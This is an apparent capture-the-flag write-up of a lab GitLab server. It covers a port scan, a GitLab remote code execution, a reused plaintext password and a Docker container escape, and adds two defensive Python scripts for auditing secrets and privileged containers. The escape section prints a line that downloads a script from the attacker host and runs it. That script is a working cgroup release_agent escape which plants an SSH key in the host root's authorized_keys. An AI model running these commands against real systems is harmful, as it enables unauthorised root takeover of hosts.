Basic information

Port scan

Ports 22 and 5080 are open:

$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 14:23 CST
Nmap scan report for 10.10.10.220
Host is up (0.068s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.61 seconds

5080

It is a GitLab instance:

Register an arbitrary account and log in; the help page shows the version number:

GitLab RCE

This GitLab version has a known vulnerability, which appeared in Real World CTF before:

You can go through it step by step, or run an exploit in one go; either way you end up with a shell as the git user:

python3 -c 'import pty; pty.spawn("/bin/sh")'

Docker privilege escalation & user flag

GitLab runs inside a Docker container. Looking around inside it, a password turns up in the backup directory:

gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

This password is also the root password of the current container; switch to root and read user.txt from the user's home directory:
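The leaked `smtp_password` above is a typical case of a reusable credential sitting in plaintext inside a configuration backup. The following Python script is an added example, not part of the original write-up, that scans a directory tree for gitlab.rb-style secret assignments and reports them with the values redacted, so an operator can find such leaks before an intruder does. The sample config it scans is constructed inline; every key name in it other than `smtp_password` is an assumption.

```python
import re
import tempfile
from pathlib import Path

# Matches Ruby-style assignments as found in GitLab Omnibus gitlab.rb files, e.g.
#   gitlab_rails['smtp_password'] = "..."
# A leading '#' is allowed on purpose: a commented-out password is still a leak.
SECRET_KEY_RE = re.compile(
    r"""^\s*#?\s*gitlab_rails\['(?P<key>[a-z0-9_]*(?:password|secret|token|key)[a-z0-9_]*)'\]"""
    r"""\s*=\s*['"](?P<value>[^'"]+)['"]""",
    re.IGNORECASE,
)


def redact(value):
    """Keep only a two-character prefix so a finding can be matched without echoing the secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 2)


def scan_text(text, source="<memory>"):
    """Return one finding per secret-looking assignment in `text`, values redacted."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = SECRET_KEY_RE.match(line)
        if not m:
            continue
        findings.append({
            "file": source,
            "line": lineno,
            "key": m.group("key"),
            "commented": line.lstrip().startswith("#"),
            "redacted": redact(m.group("value")),
        })
    return findings


def scan_tree(root):
    """Walk `root` (e.g. an unpacked backup directory) and scan every regular file."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        findings.extend(scan_text(text, str(path)))
    return findings


# Constructed sample mirroring the gitlab.rb style shown in the write-up; the values are fake.
SAMPLE_CONFIG = """\
# constructed sample config (not a real backup)
external_url 'http://gitlab.example.test'
gitlab_rails['smtp_enable'] = true
gitlab_rails['smtp_user_name'] = "notifications"
gitlab_rails['smtp_password'] = "hunter2-EXAMPLE"
# gitlab_rails['smtp_password'] = "old-EXAMPLE"
gitlab_rails['initial_root_password'] = 'RootPw-EXAMPLE'
"""


def demo():
    """Write the constructed sample into a temporary 'backup' tree and scan it."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "backup").mkdir()
        Path(d, "backup", "gitlab.rb").write_text(SAMPLE_CONFIG)
        Path(d, "README").write_text("no secrets here\n")
        return scan_tree(d)


if __name__ == "__main__":
    for f in demo():
        flag = " (commented out)" if f["commented"] else ""
        print(f"{f['file']}:{f['line']}: {f['key']} = {f['redacted']}{flag}")
```

Point the scanner at the unpacked backup directory (`scan_tree("/path/to/backup")`); the password-reuse problem in this box is then a matter of rotating each reported key rather than hunting for it by hand.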

Docker escape

References:

Following the tutorial, write your own SSH public key onto the host, then SSH in directly:

# docker
wget http://10.10.14.10:7777/miao.sh
chmod +x miao.sh
./miao.sh

# local
ssh root@10.10.10.220

miao.sh

mkdir /tmp/miao && mount -t cgroup -o rdma cgroup /tmp/miao && mkdir /tmp/miao/x
echo 1 > /tmp/miao/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/miao/release_agent

echo '#!/bin/sh' > /cmd
echo "echo 'ssh-rsa ***' > /root/.ssh/authorized_keys" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/miao/x/cgroup.procs"
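The script above only works because the container can mount cgroupfs and write `release_agent`, which needs CAP_SYS_ADMIN, typically granted by running the container with `--privileged` or `--cap-add SYS_ADMIN`. The following Python audit is an added example, not part of the original write-up, that reads `docker inspect` JSON and flags containers whose `HostConfig` grants that capability or disables AppArmor, so the misconfiguration can be found before it is abused. The inspect output it parses is constructed inline and trimmed to the fields the audit uses; the container names are made up.

```python
import json

# Constructed `docker inspect` output (list of container objects), reduced to the
# HostConfig fields this audit inspects. Real output carries many more keys.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/gitlab",
     "HostConfig": {"Privileged": True, "CapAdd": None, "CapDrop": None, "SecurityOpt": None}},
    {"Name": "/builder",
     "HostConfig": {"Privileged": False, "CapAdd": ["SYS_ADMIN"], "CapDrop": None,
                    "SecurityOpt": ["apparmor=unconfined"]}},
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "CapAdd": None, "CapDrop": ["ALL"],
                    "SecurityOpt": ["no-new-privileges"]}},
])


def normalize_cap(name):
    """Docker accepts both 'SYS_ADMIN' and 'CAP_SYS_ADMIN'; compare on the bare form."""
    name = name.upper()
    return name[4:] if name.startswith("CAP_") else name


def audit_container(entry):
    """Return a list of human-readable issues for one container object; empty means clean."""
    hc = entry.get("HostConfig") or {}
    issues = []
    if hc.get("Privileged"):
        issues.append("privileged: full capability set, cgroupfs and host devices reachable")
    cap_add = {normalize_cap(c) for c in (hc.get("CapAdd") or [])}
    if cap_add & {"ALL", "SYS_ADMIN"}:
        issues.append("CAP_SYS_ADMIN added: container can mount cgroupfs and set release_agent")
    sec = hc.get("SecurityOpt") or []
    if any(opt in ("apparmor=unconfined", "apparmor:unconfined") for opt in sec):
        issues.append("AppArmor profile disabled")
    return issues


def audit_inspect_output(raw_json):
    """Map container name -> issues for every container that has at least one issue."""
    report = {}
    for entry in json.loads(raw_json):
        issues = audit_container(entry)
        if issues:
            report[entry.get("Name", "?").lstrip("/")] = issues
    return report


if __name__ == "__main__":
    # In practice feed it:  docker inspect $(docker ps -q) | python3 this_script.py
    for name, issues in audit_inspect_output(SAMPLE_INSPECT).items():
        print(name)
        for issue in issues:
            print("  -", issue)
```

The clean configuration in the sample (`CapDrop: ["ALL"]`, `no-new-privileges`, no `Privileged`) is the shape to aim for: a GitLab container that needs nothing from the host has no reason to carry CAP_SYS_ADMIN, and without it the `mount -t cgroup` step in miao.sh fails.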

Root flag

Then read root.txt directly:

References